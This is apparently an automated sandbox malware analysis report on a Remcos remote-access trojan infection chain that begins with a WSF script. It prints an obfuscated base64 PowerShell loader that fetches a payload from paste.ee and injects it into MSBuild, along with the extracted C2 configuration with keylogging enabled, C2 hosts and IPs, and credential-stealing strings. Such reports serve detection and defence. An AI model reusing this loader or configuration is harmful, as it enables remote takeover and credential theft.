mRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumar, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbG

                          Stealing of Sensitive Information

                          barindex
                          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 7824, TargetFilename: C:\ProgramData\remcos\logs.dat
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-04T11:09:26.465982+010020204251Exploit Kit Activity Detected104.21.84.67443192.168.2.449739TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-04T11:09:26.465982+010020204241Exploit Kit Activity Detected104.21.84.67443192.168.2.449739TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-04T11:09:00.772618+010020283713Unknown Traffic192.168.2.449731104.21.84.67443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-04T11:09:29.988337+010020365941Malware Command and Control Activity Detected192.168.2.449740160.25.73.256426TCP
                          2024-12-04T11:09:33.378941+010020365941Malware Command and Control Activity Detected192.168.2.449741160.25.73.256426TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-04T11:09:33.129463+010028033043Unknown Traffic192.168.2.449742178.237.33.5080TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-04T11:09:27.465960+010028582951A Network Trojan was detected104.21.84.67443192.168.2.449739TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-04T11:09:26.007651+010028410751Malware Command and Control Activity Detected192.168.2.449739104.21.84.67443TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: lewisham1122.ddnsking.comAvira URL Cloud: Label: malware
                          Source: 00000007.00000002.4120281726.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["lewisham1122.ddnsking.com:6426:1"], "Assigned name": "4", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-L31JDJ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000007.00000002.4122174513.0000000002A6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.4120281726.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.4120281726.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7824, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,7_2_0043293A
                          Source: MSBuild.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                          Exploits

                          barindex
                          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7824, type: MEMORYSTR

                          Privilege Escalation

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00406764 _wcslen,CoGetObject,7_2_00406764
                          Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49731 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49739 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49744 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49929 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49999 version: TLS 1.2

                          Spreading

                          barindex
                          Source: Yara matchFile source: Order_DEC2024.wsf, type: SAMPLE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040B335
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,7_2_0041B42F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040B53A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,7_2_004089A9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00406AC2 FindFirstFileW,FindNextFileW,7_2_00406AC2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,7_2_00407A8C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_00418C69
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,7_2_00408DA7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_100010F1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040AE51 FindFirstFileW,FindNextFileW,8_2_0040AE51
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407EF8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_00406F06

                          Software Vulnerabilities

                          barindex
                          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49740 -> 160.25.73.25:6426
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 160.25.73.25:6426
                          Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.4:49739
                          Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.4:49739
                          Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.4:49739
                          Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
                          Source: Malware configuration extractorURLs: lewisham1122.ddnsking.com
                          Source: unknownDNS query: name: paste.ee
                          Source: global trafficTCP traffic: 192.168.2.4:49740 -> 160.25.73.25:6426
                          Source: global trafficHTTP traffic detected: GET /r/owchf/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                          Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                          Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                          Source: Joe Sandbox ViewASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
                          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.84.67:443
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49742 -> 178.237.33.50:80
                          Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49739 -> 104.21.84.67:443
                          Source: global trafficHTTP traffic detected: GET /d/GXRLA HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                          Source: global trafficHTTP traffic detected: GET /d/GXRLA HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004260F7 recv,7_2_004260F7
                          Source: global trafficHTTP traffic detected: GET /d/GXRLA HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                          Source: global trafficHTTP traffic detected: GET /r/owchf/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /d/GXRLA HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                          Source: MSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                          Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                          Source: MSBuild.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: MSBuild.exe, 00000008.00000002.2074166305.0000000000F3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                          Source: MSBuild.exe, 00000008.00000002.2074166305.0000000000F3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                          Source: bhv59C6.tmp.8.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                          Source: bhv59C6.tmp.8.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                          Source: MSBuild.exe, 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                          Source: MSBuild.exe, 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                          Source: global trafficDNS traffic detected: DNS query: paste.ee
                          Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                          Source: global trafficDNS traffic detected: DNS query: lewisham1122.ddnsking.com
                          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                          Source: MSBuild.exe, MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4120281726.0000000001015000.00000004.00000020.00020000.00000000.sdmp, bhv59C6.tmp.8.drString found in binary or memory: http://geoplugin.net/json.gp
                          Source: MSBuild.exe, 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001015000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0:
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0H
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0I
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0Q
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://ocsp.msocsp.com0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://ocsp.msocsp.com0S
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://ocspx.digicert.com0E
                          Source: wscript.exe, 00000000.00000003.1712940863.0000013A5779D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714188174.0000013A5779E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712851322.0000013A57792000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713522335.0000013A598C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714377412.0000013A57A7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1714419138.0000013A59260000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713498375.0000013A57A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/GXRLA
                          Source: wscript.exe, 00000000.00000002.1714125091.0000013A57759000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713810861.0000013A57758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/GXRLAi.csv8
                          Source: powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000001.00000002.1968637783.0000014909FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000001.00000002.1968637783.000001490A1D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://www.digicert.com/CPS0~
                          Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                          Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                          Source: MSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                          Source: MSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                          Source: bhv59C6.tmp.8.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
                          Source: MSBuild.exe, 00000008.00000002.2072845831.00000000007EF000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                          Source: MSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                          Source: bhv59C6.tmp.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
